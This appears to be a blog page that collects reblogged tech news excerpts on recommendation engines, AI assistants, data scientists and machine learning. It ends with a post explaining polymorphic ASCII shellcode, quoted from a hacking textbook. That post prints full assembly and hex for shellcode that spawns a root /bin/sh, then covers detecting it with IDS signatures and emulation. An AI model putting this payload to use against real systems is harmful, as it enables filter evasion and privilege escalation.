The Ultimate Challenge For Recommendation Engines | MIT Technology Review

If you share an on-line move account with other people in your household, you probably receive some inappropriate recommendations. That may soon change.

The phrase “People who bought X, also bought Y” has become one of the celebrated monikers of the internet era. This particular form of words comes from recommendation engines that analyse the products you have bought in the past to suggest products you might like in future, usually based on the choices made by other people with similar tastes.

Good recommendation engines can increase sales by several percent. Which is why they have become one of the must-have features for online shops and services.

So it is not hard to understand why there is considerable interest in improving the performance of recommendation engines. Indeed, in 2006, the online movie provider, Netflix, offered a prize of $1 million to anybody who could improve their recommendation algorithm by more than 10 percent. The prize was duly snapped up a mere three years later.

So where might the next improvements come from?

Today, we get an answer of sorts thanks to the work of Amy Zhang at the Massachusetts Institute of Technology in Cambridge and a couple of pals. These guys point out that when it comes to online services such as movie providers, several individuals often share the same account. That means that the choice of movies and the ratings on this account are the combined choices of several different people.

The question they set out to answer is whether it is possible to identify shared accounts simply by studying the ratings associated with it. And if so, how should recommendations be modified in response?

via The Ultimate Challenge For Recommendation Engines | MIT Technology Review.

Advertisements

This analysis of modern history is a prime example of why big data really matters

Gigaom

We might be tiring of the term big data, but there’s still a lot of value to be squeezed from the concept. This is true even in its purest form, where we’re doing relatively simple operations on a mountain of data in order to see if there’s a notable trend or correlation in there.

The latest example of why this is true comes from GDELT, the massive geosocial-event database that’s now housed in Google’s cloud. Its creator, Georgetown professor Kalev Leetaru, has analyzed the Arab Spring uprising in Egypt, as well as the current situation in Ukraine, against data dating back to 1979 in an attempt to answer the question of whether history really does repeat itself.

Finding the answer, he acknowledges, will take a lot more expert analysis, but his data can give researchers a great start. The process of generating it was a single SQL query (researchers can…

View original post 488 more words

Forget Siri: This Radical New AI Teaches Itself and Reads Your Mind | Enterprise | WIRED

BY STEVEN LEVY

Viv was named after the Latin root meaning live. Its San Jose, California, offices are decorated with tsotchkes bearing the numbers six and five (VI and V in roman numerals). ARIEL ZAMBELICH

When Apple announced the iPhone 4S on October 4, 2011, the headlines were not about its speedy A5 chip or improved camera. Instead they focused on an unusual new feature: an intelligent assistant, dubbed Siri. At first Siri, endowed with a female voice, seemed almost human in the way she understood what you said to her and responded, an advance in artificial intelligence that seemed to place us on a fast track to the Singularity. She was brilliant at fulfilling certain requests, like “Can you set the alarm for 6:30?” or “Call Diane’s mobile phone.” And she had a personality: If you asked her if there was a God, she would demur with deft wisdom. “My policy is the separation of spirit and silicon,” she’d say.

Over the next few months, however, Siri’s limitations became apparent. Ask her to book a plane trip and she would point to travel websites—but she wouldn’t give flight options, let alone secure you a seat. Ask her to buy a copy of Lee Child’s new book and she would draw a blank, despite the fact that Apple sells it. Though Apple has since extended Siri’s powers—to make an OpenTable restaurant reservation, for example—she still can’t do something as simple as booking a table on the next available night in your schedule. She knows how to check your calendar and she knows how to use Open­Table. But putting those things together is, at the moment, beyond her.

Now a small team of engineers at a stealth startup called Viv Labs claims to be on the verge of realizing an advanced form of AI that removes those limitations. Whereas Siri can only perform tasks that Apple engineers explicitly implement, this new program, they say, will be able to teach itself, giving it almost limitless capabilities. In time, they assert, their creation will be able to use your personal preferences and a near-infinite web of connections to answer almost any query and perform almost any function.

“Siri is chapter one of a much longer, bigger story,” says Dag Kittlaus, one of Viv’s cofounders. He should know. Before working on Viv, he helped create Siri. So did his fellow cofounders, Adam Cheyer and Chris Brigham.

For the past two years, the team has been working on Viv Labs’ product—also named Viv, after the Latin root meaning live. Their project has been draped in secrecy, but the few outsiders who have gotten a look speak about it in rapturous terms. “The vision is very significant,” says Oren Etzioni, a renowned AI expert who heads the Allen Institute for Artificial Intelligence. “If this team is successful, we are looking at the future of intelligent agents and a multibillion-dollar industry.”

Viv is not the only company competing for a share of those billions. The field of artificial intelligence has become the scene of a frantic corporate arms race, with Internet giants snapping up AI startups and talent. Google recently paid a reported $500 million for the UK deep-learning company DeepMind and has lured AI legends Geoffrey Hinton and Ray Kurzweil to its headquarters in Mountain View, California. Facebook has its own deep-learning group, led by prize hire Yann LeCun from New York University. Their goal is to build a new generation of AI that can process massive troves of data to predict and fulfill our desires.

via Forget Siri: This Radical New AI Teaches Itself and Reads Your Mind | Enterprise | WIRED.

Big Data’s High-Priests of Algorithms – Wall Street Journal

‘Data Scientists’ Meld Statistics and Software for Find Lucrative High-Tech

By ELIZABETH DWOSKIN

Aug. 8, 2014 8:11 p.m. ET

Academic Researchers Find Lucrative Work as 'Big Data' Scientists - WSJ

Saba Zuberi, an astrophysicist working as a data scientist at TaskRabbit, said working for a consumer Internet firm can be surprisingly rewarding. Ramin Rahimian for The Wall Street

For his Ph.D. in astrophysics, Chris Farrell spent five years mining data from a giant particle accelerator. Now, he spends his days analyzing ratings for Yelp Inc. YELP -0.90% ‘s online business-review site.

Mr. Farrell, 28 years old, is a data scientist, a job title that barely existed three years ago

but since has become one of the hottest corners of the high-tech labor market. Retailers, banks, heavy-equipment makers and matchmakers all want specialists to extract and interpret the explosion of data from Internet clicks, machines and smartphones, setting off a scramble to find or train them.

“People call them unicorns” because the combination of skills required is so rare, said Jonathan Goldman, who ran LinkedIn Corp.’s LNKD +0.66% data-science team that in 2007 developed the “People You May Know” button, which five years later drove more than half of the invitations on the professional-networking platform.

Employers say the ideal candidate must have more than traditional market-research skills: the ability to find patterns in millions of pieces of data streaming in from different sources, to infer from those patterns how customers behave and to write statistical models that pinpoint behavioral triggers.

At e-commerce site operator Etsy Inc., for instance, a biostatistics Ph.D. who spent years mining medical records for early signs of breast cancer now writes statistical models to figure out the terms people use when they search Etsy for a new fashion they saw on the street.

At mobile-payments startup Square Inc., a Ph.D. in cognitive psychology who wrote statistical models to examine how people change their political beliefs now looks for behavioral patterns that would identify which merchants are more likely to have clients demand their money back.

Another 28-year-old at Yelp, with a Ph.D. in applied mathematics, turned his dissertation research on genome mapping into a product used by the company’s advertising team. The same genome-mapping algorithm is now used to measure the effect on consumers when multiple small changes are made to online ads.

“Academia is slow and only a few people see your work,” said Scott Clark, who designed the genome-mapping algorithm. “At Yelp, I can be pushing out experiments that affect hundreds of millions of people. When I make a small change to the Yelp website, I have a bigger impact.”

via Academic Researchers Find Lucrative Work as ‘Big Data’ Scientists – WSJ.

Powerful new patent service shows every US invention, and a new view of R&D relationships

Gigaom

The website for the U.S. Patent Office website is famously clunky: searching and sorting patents can feel like playing an old Atari game, rather than watching innovation at work. But now a young inventor has come along with a tool to build a better patent office.

The service is called Trea, and was launched by Max Yuan, an engineer who received a patent of his own for a bike motor in 2007. After writing a tool to download patents related to his own invention, he expanded the process to slurp every patent and image in the USPTO database, and compile the information in a user-friendly interface.

Trea has been in beta for a while, but will formally launch on Wednesday. The tool not only provides an easy way to see what inventions a company or inventor is patenting, but also shows the fields in which they are most active. Here is…

View original post 407 more words

Why a deep-learning genius left Google & joined Chinese tech shop Baidu (interview) | VentureBeat

Image Credit: Jordan Novet/VentureBeat

By Jordan Novet

SUNNYVALE, California — Chinese tech company Baidu has yet to make its popular search engine and other web services available in English. But consider yourself warned: Baidu could someday wind up becoming a favorite among consumers.

The strength of Baidu lies not in youth-friendly marketing or an enterprise-focused sales team. It lives instead in Baidu’s data centers, where servers run complex algorithms on huge volumes of data and gradually make its applications smarter, including not just Web search but also Baidu’s tools for music, news, pictures, video, and speech recognition.

Despite lacking the visibility (in the U.S., at least) of Google and Microsoft, in recent years Baidu has done a lot of work on deep learning, one of the most promising areas of artificial intelligence (AI) research in recent years. This work involves training systems called artificial neural networks on lots of information derived from audio, images, and other inputs, and then presenting the systems with new information and receiving inferences about it in response.

Two months ago, Baidu hired Andrew Ng away from Google, where he started and led the so-called Google Brain project. Ng, whose move to Baidu follows Hugo Barra’s jump from Google to Chinese company Xiaomi last year, is one of the world’s handful of deep-learning rock stars.

Ng has taught classes on machine learning, robotics, and other topics at Stanford University. He also co-founded massively open online course startup Coursera.

via Why a deep-learning genius left Google & joined Chinese tech shop Baidu (interview) | VentureBeat | Big Data | by Jordan Novet.

GraphLab thinks its new software can democratize machine learning

Gigaom

GraphLab, a Seattle-based startup that launched in 2013 to develop an open source project of the same name, is releasing next week its first commercial software, called GraphLab Create. Unlike the open source software that is focused on graph analysis, Create is designed for data stored in graphs or tables, and can be used to easily run any number of popular machine learning tasks.

Carlos Guestrin, the company’s co-founder and CEO, said the goal of Create is to help savvy engineers or data scientists take their machine learning projects from idea to production. It includes a handful of modules for building certain types of popular workloads, including recommendation engines, graph analysis and clustering and regression algorithms.

We have previously covered some of the disillusionment with current machine learning libraries — many of which are open source — with regard to speed and ease of use. Even where those factors are improving

View original post 410 more words

What the hell ! | Damn’ Shell

Smuggling – Wikipedia describes the word as “the illegal transportation of objects or people, such as out of a building, into a prison, or across an international border, in violation of applicable laws or other regulations”.

Come to think of it – When you think of the word ‘smuggling’ the first thing that comes to mind is – ‘its wrong’ which is true but if you can overlook the legalities and dive a bit deeper into the specifics you might just find a new or rather ‘ingenious’ transportation method that we’ve been oblivious to all along. This sort of ingenuity carries on from the real world into the virtual world considering its an extension of the real world by design. The art of stealth is at the core of offensive computer security and being able to smuggle stuff into a target environment is considered ‘nirvana’ in the field.

The bad guys (for lack of a better word) spend a considerable amount of time mastering the art of smuggling all kinds of malicious code onto a target environment and in some cases the amount of time spent developing the actual code/payload is far less when compared to the amount of time spent devising a way to get it to its destination.

One such method involves employing polymorphism – a concept that clearly has one too many definitions (thanks to the technology/internet Gurus). Its nothing more than code that modifies (modification can be addition/deletion) itself when executed. This underlying idea allows you to change what your code/payload looks like but never really change what it does (essentially a state change without any change in functionality) which makes it ideal to evade detection during transportation. Put simply, it’s a bomb that doesn’t look like a bomb until its ready.

Of all the virtual bomb making tools, the one that’s really ubiquitous is ‘shellcode‘ for it takes away most of the abstractions of higher level programming languages. Shellcode is code written in ‘assembly’ without any restrictions on the layout of the code i.e. its position independent. In other words shellcode allows you to write code in a language that is almost native to the target (i.e. system/processor) providing you with a great deal of flexibility.

For example – ASCII shellcode can get past most ASCII character checks/filters. Here is what it looks like in assembly [1]

 

BITS 32

push esp                               ; Put current ESP
pop eax                                ; into EAX.
sub eax, 0x39393333                    ; Subtract printable values
sub eax,0x72727550                     ; to add 860 to EAX.
sub eax,0x54545421
push eax                               ; Put EAX back into ESP.
pop esp                                ; Effectively ESP = ESP + 860

and eax,0x454e4f4a
and eax,0x3a313035                     ; Zero out EAX.

sub eax,0x346d6d25                     ; Subtract printable values
sub eax,0x256d6d25                     ; to make EAX = 0x80cde189.
sub eax,0x2557442d                     ; (last 4 bytes from shellcode.bin)

push eax                               ; Push these bytes to stack at ESP.
sub eax,0x59316659                     ; Subtract more printable values
sub eax,0x59667766                     ; to make EAX = 0x53e28951.
sub eax,0x7a537a79                     ; (next 4 bytes of shellcode from the end)
push eax
sub eax,0x25696969
sub eax,0x25786b5a
sub eax,0x25774625
push eax                                         ; EAX = 0xe3896e69
sub eax,0x366e5858
sub eax,0x25773939
sub eax,0x25747470
push eax                                         ; EAX = 0x622f6868
sub eax,0x25257725
sub eax,0x71717171
sub eax,0x5869506a
push eax                                         ; EAX = 0x732f2f68
sub eax,0x63636363
sub eax,0x44307744
sub eax,0x7a434957
push eax                                         ; EAX = 0x51580b6a
sub eax,0x63363663
sub eax,0x6d543057
push eax                                         ; EAX = 0x80cda4b0
sub eax,0x54545454
sub eax,0x304e4e25
sub eax,0x32346f25
sub eax,0x302d6137
push eax                                         ; EAX = 0x99c931db
sub eax,0x78474778
sub eax,0x78727272
sub eax,0x774f4661
push eax                                         ; EAX = 0x31c03190
sub eax,0x41704170
sub eax,0x2d772d4e
sub eax,0x32483242
push eax                                         ; EAX = 0x90909090
push eax
push eax                                         ; Build a NOP sled.
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

And when assembled into machine code, here’s what you get (note the repetitive pattern in its ASCII representation to the right)

00000000 54 58 2d 33 33 39 39 2d 50 75 72 72 2d 21 54 54 |TX-3399-Purr-!TT|
00000010 54 50 5c 25 4a 4f 4e 45 25 35 30 31 3a 2d 25 6d |TP\%JONE%501:-%m|
00000020 6d 34 2d 25 6d 6d 25 2d 2d 44 57 25 50 2d 59 66 |m4-%mm%–DW%P-Yf|
00000030 31 59 2d 66 77 66 59 2d 79 7a 53 7a 50 2d 69 69 |1Y-fwfY-yzSzP-ii|
00000040 69 25 2d 5a 6b 78 25 2d 25 46 77 25 50 2d 58 58 |i%-Zkx%-%Fw%P-XX|
00000050 6e 36 2d 39 39 77 25 2d 70 74 74 25 50 2d 25 77 |n6-99w%-ptt%P-%w|
00000060 25 25 2d 71 71 71 71 2d 6a 50 69 58 50 2d 63 63 |%%-qqqq-jPiXP-cc|
00000070 63 63 2d 44 77 30 44 2d 57 49 43 7a 50 2d 63 36 |cc-Dw0D-WICzP-c6|
00000080 36 63 2d 57 30 54 6d 50 2d 54 54 54 54 2d 25 4e |6c-W0TmP-TTTT-%N|
00000090 4e 30 2d 25 6f 34 32 2d 37 61 2d 30 50 2d 78 47 |N0-%o42-7a-0P-xG|
000000a0 47 78 2d 72 72 72 78 2d 61 46 4f 77 50 2d 70 41 |Gx-rrrx-aFOwP-pA|
000000b0 70 41 2d 4e 2d 77 2d 2d 42 32 48 32 50 50 50 50 |pA-N-w–B2H2PPPP|
000000c0 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 50 |PPPPPPPPPPPPPPPP| 

The above code morphs or rather loads additional malicious code into memory when executed as you can see below i.e. the shellcode will not reveal its actual form until it is eventually executed on a real CPU.
00000000 31 c0 31 db 31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 |1.1.1……j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 |//shh/bin..Q..S.|
00000020 e1 cd 80

 

polyshellcode

So the big question – What can we do ?

Well – Traditional intrusion detection systems (IDS) like Snort or *WAFs can be used to detect shellcode, using signature matching techniques where we look for known/recurring patterns or specific parts of the shellcode. Although this is polymorphic we can look for NOP sled pattern, ‘sub’ instruction containing repetitive characters or a combination.

Note – The above example is just one form of polymorphic shellcode. Attackers are constantly working to find more (again ingenious damn’ it) ways to sneak stuff across. Another interesting method is the use of polymorphic shellcode engines to create different forms of the same initial shellcode by encrypting its body with a different random key each time, and by prepending to it a decryption routine that makes it self-decrypting. In such scenarios conventional signature based detection methods fall short and require security researchers to detect network streams that contain polymorphic exploit code by passively monitoring the incoming network traffic where you attempt to “execute” each incoming request in a virtual environment as if it was executable code [2].

 

*WAF – Web application firewalls

Reference –

[1] Jon Erickson “Hacking: The Art of Exploitation, 2nd edition”

[2] Michalis Polychronaki, Kostas G. Anagnostakis and Evangelos P. Markatos “Network-Level Polymorphic Shellcode Detection UsingEmulation” Institute of Computer Science, Foundation for Research & Technology – Hellas, Institute for Infocomm Research, Singapore